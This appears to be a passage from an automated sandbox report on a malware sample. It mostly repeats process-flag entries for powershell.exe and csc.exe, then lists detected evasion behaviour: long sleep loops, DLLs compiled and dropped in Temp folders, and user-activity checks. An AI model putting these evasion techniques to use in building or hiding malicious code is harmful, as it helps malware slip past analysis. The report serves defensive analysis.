Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2728 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2728 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 2687 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 1542 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -592128s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 1728 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -82944s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 588 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -56448s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 1716 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -41184s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 1395 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -267840s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 174 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 44 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440 Thread sleep count: 5010 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876 Thread sleep count: 861 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2320 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3120 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 604 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768 Thread sleep count: 7538 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768 Thread sleep count: 1838 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1320 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\control.exe TID: 668 Thread sleep time: -1773297476s >= -30000s
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1599 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1057 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 2880 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1015 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 544 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 733 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1856 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 2687 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1542 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1728 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 588 Jump to behavior
